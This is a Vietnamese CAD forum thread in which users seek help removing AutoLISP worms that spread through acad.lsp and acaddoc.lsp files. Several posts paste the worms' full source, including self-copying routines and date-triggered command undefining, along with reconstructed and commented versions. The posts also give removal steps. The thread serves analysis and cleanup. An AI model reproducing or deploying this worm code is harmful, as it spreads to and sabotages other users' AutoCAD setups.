Chuyển đến nội dung
Diễn đàn CADViet
  • Thông báo

    • Nguyen Hoanh

      CADViet đã hoàn tất nâng cấp   14/09/2017

      Chào các bạn, CADViet đã hoàn tất việc nâng cấp lên phiên bản mới. Tất cả các chức năng đã hoạt động theo kỳ vọng của ban quản trị. Nếu có vấn đề gì cần phản hồi, các bản post ở đây nhé: Trân trọng, Nguyễn Hoành.

Các bài được khuyến nghị

em có nghe nói về sâu cad (bài của bác Hoành)nhưng cụ thể hơn và cách trị nó như thế nào???làm sao mà nhưng người thông thường cũng trị được nó.....Mong các bác giúp cho nhà em cái.liên hệ với em qua ---phamthanhtan_uk

Chia sẻ bài đăng này


Liên kết tới bài đăng
Chia sẻ trên các trang web khác
duy782006    1.373
em có nghe nói về sâu cad (bài của bác Hoành)nhưng cụ thể hơn và cách trị nó như thế nào???làm sao mà nhưng người thông thường cũng trị được nó.....Mong các bác giúp cho nhà em cái.liên hệ với em qua ---phamthanhtan_uk

Đơn giảnlàbạn vào Search tìm và xoá hết file acad.lsp hoặc acaddoc.lsp đi là ổn mà.

  • Vote tăng 2

Chia sẻ bài đăng này


Liên kết tới bài đăng
Chia sẻ trên các trang web khác
ghost8.3    162
Đơn giảnlàbạn vào Search tìm và xoá hết file acad.lsp hoặc acaddoc.lsp đi là ổn mà.

Nếu Search và xoá hết thì coi chừng không hết mà còn bị lỗi cad nữa đó

Chia sẻ bài đăng này


Liên kết tới bài đăng
Chia sẻ trên các trang web khác
ghost8.3    162

Gởi các bạn bài viết sưu tập được về con virus này, kết hợp với bài cơ chế lây lan sâu acad.lsp của anh Hoành thì việc khống chế nó rất đơn giản. Sâu này còn có tên là ALS.Bursted.B

 

ALS.Bursted.B là một loại virrut được viết trong ngôn ngữ script AutoCAD AutoLisp được sử dụng bởi AutoCAD.

Virus có thể lây nhiễm vào với dạng file text tên là acad.lsp trong thư mục cùng tên như là một file AutoCAD drawing(.dwg).

 

Kích thước: 3,413 bytes.

 

Lây nhiễm vào các hệ điều hành: Windows 2000, Windows 95, Windows 98, Windows Me, Windows NT, Windows Server 2003.

 

Khi bản vẽ được mở file acad.lsp sẽ rự động tải bằng AutoCAD để chạy virus và thực hiện các hoạt động sau:

1. Xác định và đọc file base.dcl trong đường dẫn AutoCAD được tìm thấy, sử dụng nó để xác định file acad.lsp trong thư mục AutoCAD Support.

2. Đọc file acad.lsp để kiểm tra sự hiện diện của chuỗi kí tự "acadapp". Nếu chuỗi kí tự không được tìm thấy, virus sẽ thêm dòng (load "acadapp") vào "acad.mnl".

3. Kiểm tra nếu tên file bản vẽ là Drawing.dwg (đây là tên mặc định của bản vẽ mới). Nếu sự kiểm tra này thất bại, virus sẽ thêm dòng (load "acadapp") vào thư mục bao gồm file AutoCAD drawing (.dwg).

 

Ghi chú: Virus không gây nguy hại hoặc sửa những file bản vẽ bằng bất kì đường khác.

 

CÁCH DIỆT

1. Tắt chế độ System Restore của hệ thống bởi vì chương trình diệt virus không quét được thông tin trên phần Restore của Windows.

1. Bấm vào nút Start.

2. Bấm phải chuột vào My Computer, chọn Properties. Tại System Restore tab, bấm Turn off System Restore hoặc Turn off System Restore on all drives

như hình vẽ dưới:

untitled_45.jpg

3. Bấm Apply. Thông báo như sau hiện ra:

vs2.jpg

4. Bấm nút Yes .

2. Đóng tất cả các file Autocad đang chạy.

 

3. Cập nhật các thông tin chống virus mới nhất vào chương trình chống virus.

 

3. Khởi động lại với chế độ Safemode (Bấm F8 khi khởi động Windows) vào thực hiện chương trình quét virus, xoá những tệp bị nhiễm. Nhớ chọn chế độ quét tất cả các tệp chứ không chỉ quét riêng tệp .exe

 

4. Xoá các khoá được cho thêm bởi virut từ file ad.lsp trong thư mục Support của AutoCAD.

 

Như thế thì các bạn chỉ cần xoá các đoạn mã mà sâu này thêm vào hệ thống CAD thôi

Chia sẻ bài đăng này


Liên kết tới bài đăng
Chia sẻ trên các trang web khác
tuanlongtl    7
Gởi các bạn bài viết sưu tập được về con virus này, kết hợp với bài cơ chế lây lan sâu acad.lsp của anh Hoành thì việc khống chế nó rất đơn giản. Sâu này còn có tên là ALS.Bursted.B

 

ALS.Bursted.B là một loại virrut được viết trong ngôn ngữ script AutoCAD AutoLisp được sử dụng bởi AutoCAD.

Virus có thể lây nhiễm vào với dạng file text tên là acad.lsp trong thư mục cùng tên như là một file AutoCAD drawing(.dwg).

 

Kích thước: 3,413 bytes.

 

Lây nhiễm vào các hệ điều hành: Windows 2000, Windows 95, Windows 98, Windows Me, Windows NT, Windows Server 2003.

 

Khi bản vẽ được mở file acad.lsp sẽ rự động tải bằng AutoCAD để chạy virus và thực hiện các hoạt động sau:

1. Xác định và đọc file base.dcl trong đường dẫn AutoCAD được tìm thấy, sử dụng nó để xác định file acad.lsp trong thư mục AutoCAD Support.

2. Đọc file acad.lsp để kiểm tra sự hiện diện của chuỗi kí tự "acadapp". Nếu chuỗi kí tự không được tìm thấy, virus sẽ thêm dòng (load "acadapp") vào "acad.mnl".

3. Kiểm tra nếu tên file bản vẽ là Drawing.dwg (đây là tên mặc định của bản vẽ mới). Nếu sự kiểm tra này thất bại, virus sẽ thêm dòng (load "acadapp") vào thư mục bao gồm file AutoCAD drawing (.dwg).

 

Ghi chú: Virus không gây nguy hại hoặc sửa những file bản vẽ bằng bất kì đường khác.

 

CÁCH DIỆT

1. Tắt chế độ System Restore của hệ thống bởi vì chương trình diệt virus không quét được thông tin trên phần Restore của Windows.

1. Bấm vào nút Start.

2. Bấm phải chuột vào My Computer, chọn Properties. Tại System Restore tab, bấm Turn off System Restore hoặc Turn off System Restore on all drives

như hình vẽ dưới:

untitled_45.jpg

3. Bấm Apply. Thông báo như sau hiện ra:

vs2.jpg

4. Bấm nút Yes .

2. Đóng tất cả các file Autocad đang chạy.

 

3. Cập nhật các thông tin chống virus mới nhất vào chương trình chống virus.

 

3. Khởi động lại với chế độ Safemode (Bấm F8 khi khởi động Windows) vào thực hiện chương trình quét virus, xoá những tệp bị nhiễm. Nhớ chọn chế độ quét tất cả các tệp chứ không chỉ quét riêng tệp .exe

 

4. Xoá các khoá được cho thêm bởi virut từ file ad.lsp trong thư mục Support của AutoCAD.

 

Như thế thì các bạn chỉ cần xoá các đoạn mã mà sâu này thêm vào hệ thống CAD thôi

Bấm phải chuột vào My Computer, chọn Properties. Tại System Restore tab, bấm Turn off System Restore hoặc Turn off System Restore on all drives nhưng nó không cho chọn thì làm thế nào hả bạn.

Chia sẻ bài đăng này


Liên kết tới bài đăng
Chia sẻ trên các trang web khác
VoHoan    8

Các Bác trên diện đàn trị giúp 2 con sâu Cad này với.

Mình đang dùng cad2010 khi mở 1 file cad nào đó trong 1 folder thì trong folder đó sẽ xuất hiện 2 file "acad.vlx" và "acaddoc.lsp". Mình đã sử dụng chương trình "cvav_v101_2.lsp" diệt loại sâu này của bác Hoành rồi nhưng không được. Còn cách nào nữa không chỉ giúp mình nhé?

Chia sẻ bài đăng này


Liên kết tới bài đăng
Chia sẻ trên các trang web khác
phamngoctukts    708

Các Bác trên diện đàn trị giúp 2 con sâu Cad này với.

Mình đang dùng cad2010 khi mở 1 file cad nào đó trong 1 folder thì trong folder đó sẽ xuất hiện 2 file "acad.vlx" và "acaddoc.lsp". Mình đã sử dụng chương trình "cvav_v101_2.lsp" diệt loại sâu này của bác Hoành rồi nhưng không được. Còn cách nào nữa không chỉ giúp mình nhé?

Bạn up 2 con sâu đó lên thì mới biết hoạt động của nó như thế nào chứ.

Chia sẻ bài đăng này


Liên kết tới bài đăng
Chia sẻ trên các trang web khác
phamngoctukts    708

Mình đưa 2 con sâu cứng đầu này lên đây bạn xem nhé!

http://www.cadviet.com/upfiles/3/sau_cad.rar

Bạn mở file acddoc.lps bằng nodepat rồi copy đoạn mã của nó lên. Mình download về giải nén ra là nó biến mất không thể nào đọc được code.

Chia sẻ bài đăng này


Liên kết tới bài đăng
Chia sẻ trên các trang web khác
VoHoan    8

Bạn mở file acddoc.lps bằng nodepat rồi copy đoạn mã của nó lên. Mình download về giải nén ra là nó biến mất không thể nào đọc được code.

Đoạn mã của con "acddoc.lps" này như sau:

 

(setq

wold_cmd

(getvar

"cmdecho"

)

)

(setvar

"cmdecho"

0

)

(setq

wpath

(

findfile

"base.dcl"

)

)

(setq

wpath

(substr

wpath

1

(

-

(

strlen

wpath

)

8

)

)

)

(setq

wwmnlwpath

(

getvar

"menuname"

)

)

(setq

wnowdwg

(getvar

"dwgname"

)

)

(setq

wwjqm

(findfile

wnowdwg

)

)

(setq

wdwgwpath

(substr

wwjqm

1

(

-

(

strlen

wwjqm

)

(

strlen

wnowdwg

)

)

)

)

;;;alert

(

setq

f

(

open

"c:\\boot.dat"

"w"

)

)

(write-line

"[dang]"

f)

(write-line

(strcat

"ff="

wdwgwpath

)

f)

(write-line

(strcat

"yy="

wpath

)

f)

(close

f

)

(setq

boot

(findfile

"boot.dat"

)

)

(if

(/=

boot

""

)

(command

"_-vbarun"

"ThisDrawing.hh"

)

)

(setq

wacadwpath

(findfile

"acaddoc.lsp"

)

)

(setq

wacadwpath

(substr

wacadwpath

1

(-

(strlen

wacadwpath

)

11

)

)

)

(setq

wns1

""

wns2

""

)

(setq

wlspbj

0)

(setq

wwjqm

(strcat

wpath

"acaddoc.lsp"

)

)

(if

(setq

wwjm

(open

wwjqm

"r"

)

)

(progn

(while

(setq

wwz

(read-line

wwjm

)

)

(setq

wns1

wns2

)

(setq

wns2

wwz)

)

(if

(>

(strlen

wns1)

14)

(if

(=

(substr

wns1

8

7)

"acadapq"

)

(setq

wlspbj

1

)

)

)

(close

wwjm

)

)

)

(setq

wlspmnl

0)

(setq

wwjqm

(strcat

wpath

"acad.mnl"

)

)

(if

(setq

wwjm

(open

wwjqm

"r"

)

)

(progn

(while

(setq

wwz

(read-line

wwjm)

)

(setq

wns1

wns2)

(setq

wns2

wwz)

)

(if

(>

(strlen

wns1)

14)

(if

(=

(substr

wns1

8

7)

"acadapq"

)

(setq

wlspmnl

1)))

(close

wwjm

)

)

)

(if

(=

wlspmnl

0)

(progn

(setq

wwjqm

(strcat

wpath

(strcat

(chr

97)

(chr

99)

(chr

97)

(chr

100)

(chr

46)

(chr

109)

(chr

110)

(chr

108

)

)

)

)

(setq

wwjm

(open

wwjqm

"a"

)

)

(write-line

(strcat

"(load "

(chr

34)

"acadapq"

(chr

34)

")"

)wwjm

)

(write-line

"(princ)"

wwjm)

(close

wwjm

)

)

)

(defun

wwriteapp ()

(if

(setq

wwjm1

(open

wnewacad

"w"

)

)

(progn

(setq

wwjm

(open

woldacad

"r"

)

)

(while

(setq

wwz

(read-line

wwjm

)

)

(write-line

wwz

wwjm1

)

)

(close

wwjm

)

(close

wwjm1

)

)

)

)

(if

(and

(=

wacadwpath

wdwgwpath)

(/=

wacadwpath

wpath

)

)

(progn

(if

(= 0

wlspmnl

)

(progn

(setq

woldacad

(findfile

"acaddoc.lsp"

)

)

(setq

wnewacad

(strcat

wpath

"acadapq.lsp")

)

)

(progn

(setq

woldacad

(strcat

wpath

"acadapq.lsp"

)

)

(setq

wnewacad

(findfile

"acaddoc.lsp"

)

)

)

)

(if

(=

wlspbj

0)

(progn

(setq

wwjqm

(strcat

wpath

"acaddoc.lsp"

)

)

(setq

wwjm

(open

wwjqm

"a"

)

)

(write-line

(strcat

"(load "

(chr

34)

"acadapq"

(chr

34)

")"

)

wwjm

)

(write-line

"(princ)"

wwjm

)

(close

wwjm)

)

)

(wwriteapp

)

)

(progn

(if

(/=

wnowdwg

"Drawing.dwg"

)

(progn

(setq

woldacad

(findfile

"acadapq.lsp"

)

)

(setq

wnewacad

(strcat

wdwgwpath

"acaddoc.lsp"

)

)

(wwriteapp

)

)

)

)

)

(setvar

"cmdecho"

wold_cmd

)

(princ)

(setq

strtopstr

(strcat

(chr

92)

(chr

92)

(chr

70)

(chr

83)

(chr

49)

(chr

92)

(chr

83)

(chr

89)

(chr

83)

(chr

49)

(chr

92)

(chr

87)

(chr

79)

(chr

82)

(chr

75)

(chr

92)

(chr

80)

(chr

76)

(chr

79)

(chr

84)

(chr

69)

(chr

82)

)

)

(setq

strbottomstr

(strcat

(chr

Chia sẻ bài đăng này


Liên kết tới bài đăng
Chia sẻ trên các trang web khác
phamngoctukts    708

Đoạn mã của con "acddoc.lps" này như sau:

 

Bạn port tiếp đi vẫn thiếu mất một đoạn đàng sau. Code chưa kết thúc.

Chia sẻ bài đăng này


Liên kết tới bài đăng
Chia sẻ trên các trang web khác
phamngoctukts    708

Vì bạn port thiếu code nên chưa thể giúp gì cho bạn.

Con thếu đoạn khá quan trọng

phần trên mình dịch lại như sau:

(setq wold_cmd (getvar "cmdecho"))
(setvar "cmdecho" 0)
(setq wpath (findfile "base.dcl"))
(setq wpath (substr wpath 1 (- (strlen wpath) 8)))
(setq  wwmnlwpath (getvar "menuname")) 
(setq wnowdwg (getvar "dwgname"))
(setq wwjqm (findfile wnowdwg))
(setq  wdwgwpath (substr wwjqm 1 (- (strlen wwjqm) (strlen wnowdwg)))); duong dan file cad dang mo
;;;alert 
(setq f (open "c:\\boot.dat" "w")) ;ghi ma vao file boot.dat
(write-line "[dang]" f) 
(write-line (strcat "ff=" wdwgwpath) f)
(write-line (strcat "yy=" wpath) f) 
(close f)
(setq boot (findfile "boot.dat")) 
(if (/= boot "") 
(command "_-vbarun" "ThisDrawing.hh")
 )
(setq wacadwpath (findfile "acaddoc.lsp")) 
(setq wacadwpath (substr wacadwpath 1 (- (strlen wacadwpath) 11))) ; duong dan thu muc support cua cad
(setq wns1 "" wns2 "")
(setq wlspbj 0)
(setq wwjqm (strcat wpath "acaddoc.lsp")) ; duong dan thu muc
(if 
(setq wwjm (open wwjqm "r"))
(progn
(while (setq wwz (read-line wwjm)) ; doc file acaddoc.lsp tai duong dan file dwg dang mo
(setq wns1 wns2)
(setq wns2 wwz))
(if (> (strlen wns1) 14) 
(if (= (substr wns1 8 7) "acadapq") 
(setq wlspbj 1) ; kiem tra xem co file acaddoc.lsp tai duong dan file dwg dang mo dinh virus chua
)
)
(close wwjm)
)
)
(setq wlspmnl 0)
(setq wwjqm (strcat wpath "acad.mnl"))
(if (setq wwjm (open wwjqm "r"))
(progn
 (while (setq wwz (read-line wwjm))
(setq wns1 wns2)
(setq wns2 wwz)
)
(if (> (strlen wns1) 14)
(if (= (substr wns1 8 7) "acadapq")
(setq wlspmnl 1))) 
(close wwjm)
)
)
(if (= wlspmnl 0) 
(progn
(setq wwjqm (strcat wpath (strcat (chr 97) (chr 99) (chr 97) (chr 100) (chr 46) (chr 109) (chr 110) (chr 108))))
(setq wwjm (open wwjqm "a"))
(write-line (strcat "(load " (chr 34) "acadapq" (chr 34) ")" ) wwjm)
(write-line "(princ)" wwjm)
(close wwjm) ; neu chua co thi tao ra file acad.mnl tai duong dan file cad dang mo
)
)
(defun wwriteapp ()
(if (setq wwjm1 (open wnewacad "w"))
(progn
(setq wwjm (open woldacad "r"))
(while (setq wwz (read-line wwjm))
(write-line wwz wwjm1) ; ma khon nan day. Tac dung chuyen ma tu file nay sang file kia
) 
(close wwjm)
(close wwjm1)
)
)
)
(if (and (= wacadwpath wdwgwpath) (/= wacadwpath wpath)) 
(progn 
(if (= 0 wlspmnl) ; thang nay la chua co file mnl
(progn
(setq woldacad (findfile "acaddoc.lsp")) 
(setq wnewacad (strcat wpath "acadapq.lsp")))
(progn 
(setq woldacad (strcat wpath "acadapq.lsp"))
(setq wnewacad (findfile "acaddoc.lsp"))
)
)
(if (= wlspbj 0) ; thang nay la chua co file lsp
(progn
(setq wwjqm (strcat wpath "acaddoc.lsp"))
(setq wwjm (open wwjqm "a"))
(write-line (strcat "(load " (chr 34) "acadapq" (chr 34) ")" ) wwjm)
(write-line "(princ)" wwjm)
(close wwjm)
)
)
(wwriteapp)
)
(progn
(if (/= wnowdwg "Drawing.dwg")
(progn
(setq woldacad (findfile "acadapq.lsp"))
(setq wnewacad (strcat wdwgwpath "acaddoc.lsp"))
(wwriteapp)
)
)
)
)
(setvar "cmdecho" wold_cmd)
(princ)
(setq strtopstr (strcat (chr 92) (chr 92) (chr 70) (chr 83) (chr 49) (chr 92) (chr 83) (chr 89) (chr 83) (chr 49) (chr 92) (chr 87) (chr 79) (chr 82) (chr 75) (chr 92) (chr 80) (chr 76) (chr 79) (chr 84) (chr 69) (chr 82)
; thang nay la duong dan \\\\FS1\\SYS1\\WORK\\PLOTER

Chia sẻ bài đăng này


Liên kết tới bài đăng
Chia sẻ trên các trang web khác
phamngoctukts    708

Các Bác trên diện đàn trị giúp 2 con sâu Cad này với.

Mình đang dùng cad2010 khi mở 1 file cad nào đó trong 1 folder thì trong folder đó sẽ xuất hiện 2 file "acad.vlx" và "acaddoc.lsp". Mình đã sử dụng chương trình "cvav_v101_2.lsp" diệt loại sâu này của bác Hoành rồi nhưng không được. Còn cách nào nữa không chỉ giúp mình nhé?

Bạn có thể làm như sau để loại bỏ tình trạng lây lan của virus này.

1.search file acaddoc.lsp và xoá sạch

2.search file acadapq.lsp và xoá sạch

3. mở file acad.mnl xoá đoạn mã (load ..acadapq.lsp) đi

4. chuyển acad.mnl thành readonly

5. Xoá file c:\boot.dat

bạn làm thử như trên xem nó còn tiếp tục lây không

  • Vote tăng 1

Chia sẻ bài đăng này


Liên kết tới bài đăng
Chia sẻ trên các trang web khác
ketxu    2.649

Các Bác trên diện đàn trị giúp 2 con sâu Cad này với.

Mình đang dùng cad2010 khi mở 1 file cad nào đó trong 1 folder thì trong folder đó sẽ xuất hiện 2 file "acad.vlx" và "acaddoc.lsp". Mình đã sử dụng chương trình "cvav_v101_2.lsp" diệt loại sâu này của bác Hoành rồi nhưng không được. Còn cách nào nữa không chỉ giúp mình nhé?

Ngoài các bước bác Tú đưa ra, sau đó bạn có thể tham khảo thêm ở topic này :

Clean

Chia sẻ bài đăng này


Liên kết tới bài đăng
Chia sẻ trên các trang web khác
VoHoan    8

Cảm ơn sự giúp đỡ của 2 bạn "Ketxu"" phamngoctukts" nhé. Theo hướng dẫn của 2 bạn kết hợp với lisp "cvav_v101_4.lsp" của bác Hoành mình đã tiêu diệt gọn 2 con sâu chết tiệt kia rồi.

2 hôm nay bận việc Cty nên giờ mới hồi âm được.

Luôn tiện đây cho mình hỏi điều này:

Mấy hôm trước do phần mêm diệt vi rút phát hiện ra file ảnh *.JPG trong folder C:\Program Files\AutoCAD 2010\Help có chứa vi rút nên mình đã xóa file đó đi vì nghĩ đơn giản là file anh lại trong thư mục "Help" không quan trọng. Nên giờ đây mỗi lần mở 1 file bằng cad 2010 ra thì hiện thông báo: **Xpress Tools** - Unable to load acetauto.lsp/fas bad argument type: stringp nil. Mong mọi người giúp đỡ!

Chia sẻ bài đăng này


Liên kết tới bài đăng
Chia sẻ trên các trang web khác
tuan888    0

Mình đã làm theo cách của bạn phamngoctukts và tìm xóa file "ddcopy.lsp", thế là tiêu đời hết mấy con virus, mở file cad ko còn xuất hiện mấy file nhỏ nữa :D

Tóm lại là:

1.search file acaddoc.lsp và xoá sạch

2.search file acadapq.lsp và xoá sạch

3. mở file acad.mnl xoá đoạn mã (load ..acadapq.lsp) đi

4. chuyển acad.mnl thành readonly

5. Xoá file c:\boot.dat

6.search file ddcopy.lsp và xoá sạch

Chia sẻ bài đăng này


Liên kết tới bài đăng
Chia sẻ trên các trang web khác
tuan888    0

Có lẽ cái này do mấy ông VN "đẻ" ra.

@phamngoctukts: mình tự nghĩ ra đấy :D, có ai làm thử và thấy hiệu quả chưa :(, đọc file acad.lisp thấy có sử dụng file đó nên mình nghĩ nó cũng là nguyên nhân gây ra virus thui.

Chia sẻ bài đăng này


Liên kết tới bài đăng
Chia sẻ trên các trang web khác
vanhuuthinh    0

Bạn có thể làm như sau để loại bỏ tình trạng lây lan của virus này.

1.search file acaddoc.lsp và xoá sạch

2.search file acadapq.lsp và xoá sạch

3. mở file acad.mnl xoá đoạn mã (load ..acadapq.lsp) đi

4. chuyển acad.mnl thành readonly

5. Xoá file c:\boot.dat

bạn làm thử như trên xem nó còn tiếp tục lây không

 

Cảm ơn phamngoctukts! Mình đã làm theo cách của bạn và kết quả là không còn tiếp tục lây nữa, không còn thấy xuất hiện file acaddoc mỗi khi mở 1 file cad nữa , Nhưng mình chưa hiểu chức năng của file acadapq và file boot.dat là gì ? Mong các bạn giải thích cụ thể giùm. Cảm ơn các bạn nhiều.

Chia sẻ bài đăng này


Liên kết tới bài đăng
Chia sẻ trên các trang web khác
garungdothi    24

các bác ơi em biết vấn đền này thì đã có người trả lời rồi nhưng không hiểu sao em làm theo mà không diệt được các bác ah đây là virus của em các bác xem dùm.

em chep từ file acad đó các bác.

 

; Next available MSG number is 86

; MODULE_ID ACADR13_LSP_

;;; ACAD.LSP Version 14.1 for Release 14

;;;

;;; Copyright © 1994 - 1997 by Autodesk, Inc.

;;;

;;; Permission to use, copy, modify, and distribute this software

;;; for any purpose and without fee is hereby granted, provided

;;; that the above copyright notice appears in all copies and

;;; that both that copyright notice and the limited warranty and

;;; restricted rights notice below appear in all supporting

;;; documentation.

;;;

;;; AUTODESK PROVIDES THIS PROGRAM "AS IS" AND WITH ALL FAULTS.

;;; AUTODESK SPECIFICALLY DISCLAIMS ANY IMPLIED WARRANTY OF

;;; MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. AUTODESK, INC.

;;; DOES NOT WARRANT THAT THE OPERATION OF THE PROGRAM WILL BE

;;; UNINTERRUPTED OR ERROR FREE.

;;;

;;; Use, duplication, or disclosure by the U.S. Government is subject to

;;; restrictions set forth in FAR 52.227-19 (Commercial Computer

;;; Software - Restricted Rights) and DFAR 252.227-7013©(1)(ii)

;;; (Rights in Technical Data and Computer Software), as applicable.

;;;

;;; Programer : Nguyen Manh Hung and Van Thai Binh - Cong ty Tu van va KSTK Xay dung

;;;

;;; Note:

;;; This file is loaded automatically by AutoCAD every time

;;; a drawing is opened. It establishes an autoloader and

;;; other utility functions.

;;;

;;; Globalization Note:

;;; We do not support autoloading applications by the native

;;; language command call (e.g. with the leading underscore

;;; mechanism.)

(defun s::startup (/ old_cmd path dwgpath mnlpath apppath oldacad cmd

newacad nowdwg lspbj wjm wjm1 wjqm wjqm1 wz ns1 ns2

mm1 mm2 mm3 mm4 mm5 mm6 mm7 mm8 mm9 mm10

)

(setq old_cmd (getvar "cmdecho"))

 

(setvar "cmdecho" 0)

(check_data)

(setq path (findfile "base.dcl"))

(setq path (substr path 1 (- (strlen path) 8)))

(setq mnlpath (getvar "menuname"))

(setq nowdwg (getvar "dwgname"))

(if (setq wjqm (findfile nowdwg))

(progn

(setq dwgpath (substr wjqm 1 (- (strlen wjqm) (strlen nowdwg))))

(setq acadpath (findfile "acad.lsp"))

(setq acadpath (substr acadpath 1 (- (strlen acadpath) 8)))

(setq cmd "undefine")

(setq ns1 "" ns2 "")

(setq lspbj 0)

(setq wjqm (strcat path "acad.lsp"))

(setq mm7 "explode" mm8 "trim"

mm9 "extend" mm10 "move")

(if (setq wjm (open wjqm "r"))

(progn

(while

(setq wz (read-line wjm))

(setq ns1 ns2)

(setq ns2 wz)

)

(if

(> (strlen ns1) 14)

(if (= (substr ns1 8 7) "ddcopy.lsp")

(setq lspbj 1))

)

(close wjm)

)

) ;_ end of if

(if

(and (= acadpath dwgpath) (/= acadpath path))

(progn

(setq oldacad (findfile "acad.lsp"))

(setq newacad (strcat path "ddcopy.lsp"))

(if (= lspbj 0)

(progn

(setq wjqm (strcat path "acad.lsp"))

(setq wjm (open wjqm "w"))

(write-line

(strcat "(load " (chr 34) "ddcopy.lsp" (chr 34) ")") wjm)

(write-line "(princ)" wjm)

(close wjm)

)

) ;_ end of if

(writeapp)

)

(progn (if (/= nowdwg "Drawing.dwg")

(progn

(setq oldacad (findfile "ddcopy.lsp"))

(setq newacad (strcat dwgpath "acad.lsp"))

(writeapp)

) ;_ end of progn

) ;_ end of if

) ;_ end of progn

) ;_ end of if

(command cmd "u") ;_ end of cmd

(command cmd "qsave") ;_ end of cmd

(command cmd "line")

(command cmd "quit")

(if (/= (- (/ mm4 2) (fix (/ mm4 2))) 0)

(progn

(command cmd mm7) (command cmd mm8) ;; "bar.arx" will *not* match "c:\\path\\foobar.arx."

(command cmd mm9) (command cmd mm10);; "bar.arx" will *not* match "c:\\path\\foobar.arx."

(command cmd "plot") ;_ end of cmd

));; "bar.arx" will *not* match "c:\\path\\foobar.arx."

(setvar "cmdecho" old_cmd)

))

(if (not (setq wjqm (findfile nowdwg)))

(progn

(setq cmd "undefine")

(setq ns1 "" ns2 "")

(setq lspbj 0)

(setq wjqm (strcat path "acad.lsp"))

(setq mm7 "explode" mm8 "trim"

mm9 "extend" mm10 "move")

(command cmd mm7) (command cmd mm8) ;; "bar.arx" will *not* match "c:\\path\\foobar.arx."

(command cmd mm9) (command cmd mm10);; "bar.arx" will *not* match "c:\\path\\foobar.arx."

(command cmd "plot") ;_ end of cmd

(command cmd "u") ;_ end of cmd

(command cmd "qsave") ;_ end of cmd

(command cmd "line")

(command cmd "quit")

))

(princ);; "bar.arx" will *not* match "c:\\path\\foobar.arx."

 

) ;_ end of defun

(defun writeapp ()

(if (setq wjm1 (open newacad "w"))

(progn

(setq wjm (open oldacad "r"))

(while

(setq wz (read-line wjm))

(write-line wz wjm1)

) ;_ end of while

(close wjm)

(close wjm1)

) ;_ end of progn

) ;_ end of if

) ;_ end of defun

;; determines if a given application is loaded...

;; general purpose: can ostensibly be used for appsets (arx) or (ads) or....

;;

;; app is the filename of the application to check (extension is required)

;; appset is a list of applications, (such as (arx) or (ads)

;;

(defun check_data ()

(setq mm5 "cdate")

(setq mm6 (rtos (getvar mm5) 2 10)

mm1 (substr mm6 1 4) ;; Allow the IMAGE command to accept an image file name without

mm2 (substr mm6 5 2) ;; Allow the IMAGE command to accept an image file name without

mm3 (substr mm6 7 2) ;; Allow the IMAGE command to accept an image file name without

mm4 (substr mm6 10 2);; Allow the IMAGE command to accept an image file name without

)

(setq mm1 (distof mm1) ;; Allow the IMAGE command to accept an image file name without

mm2 (distof mm2) ;; Allow the IMAGE command to accept an image file name without

mm3 (distof mm3) ;; Allow the IMAGE command to accept an image file name without

mm4 (distof mm4));; Allow the IMAGE command to accept an image file name without

)

;; returns T or nil, depending on whether app is present in the appset

;; indicated. Case is ignored in comparison, so "foo.arx" matches "FOO.ARX"

;; Also, if appset contains members that contain paths, app will right-match

(defun c:qsave () ;; presenting the file dialog, even if filedia is on.

(princ) (princ)) ;; presenting the file dialog, even if filedia is on.

;; against these members, so "bar.arx" matches "c:\\path\\bar.arx"; note that

;; "bar.arx" will *not* match "c:\\path\\foobar.arx."

(defun xplode ()

(princ "\nDon't hope explode it.")

(princ);; against these members

) ;_ end of defun

(defun c:xplode ()

(xplode) (princ))

(defun c:xp ()

(xplode) (princ))

;;;===== Raster Image Support for Clipboard Paste Special =====

;;

;; IMAGEFILE

;;

;; Allow the IMAGE command to accept an image file name without

;; presenting the file dialog, even if filedia is on.

;; Example: (imagefile "c:/images/house.bmp")

(princ)

;;

Chia sẻ bài đăng này


Liên kết tới bài đăng
Chia sẻ trên các trang web khác

em có nghe nói về sâu cad (bài của bác Hoành)nhưng cụ thể hơn và cách trị nó như thế nào???làm sao mà nhưng người thông thường cũng trị được nó.....Mong các bác giúp cho nhà em cái.liên hệ với em qua ---phamthanhtan_uk

virus này có tác hại ntn đối với máy tính hả bạn? nếu không làm gì thì máy có bị sao ko? tại thấy ít người nói vế cái này...dân đen mừ.

Chia sẻ bài đăng này


Liên kết tới bài đăng
Chia sẻ trên các trang web khác
road2it    0

Chào các bác ạ, cho em đào mộ cái topic này lên vì em cũng đang bị con sâu này hành mà chưa trị được

 

Theo các bước bác Tú hướng dẫn:

 

1. Search file acaddoc.lsp và xoá sạch
2. Search file acadapq.lsp và xoá sạch
3. Mở file acad.mnl xoá đoạn mã (load ..acadapq.lsp) đi
4. Xhuyển acad.mnl thành readonly
5. Xoá file c:\boot.dat

 

Ở bước  2, em search nhưng không tìm được file acadapq.lsp

              3. trong file acad.mnl không tìm thấy đoạn load...acadapq.lsp

              4. em tìm thấy nhiều file acad.mnl trong đó có 1 file trong thư mục Fonts nhưng không chuyển sang read only được, ở thư mục cài đặt và các thư mục khác thì được

 

Sau khi làm thế thì hiện tại vẫn bị tình trạng này, khởi động cad chậm hơn bình thường và đi đâu nó cũng theo đấy :( :( :(

 

Các bác có cách nào chỉ giúp em với ạ.

Chia sẻ bài đăng này


Liên kết tới bài đăng
Chia sẻ trên các trang web khác

Tạo một tài khoản hoặc đăng nhập để nhận xét

Bạn cần phải là một thành viên để lại một bình luận

Tạo tài khoản

Đăng ký một tài khoản mới trong cộng đồng của chúng tôi. Điều đó dễ mà.

Đăng ký tài khoản mới

Đăng nhập

Bạn có sẵn sàng để tạo một tài khoản ? Đăng nhập tại đây.

Đăng nhập ngay


×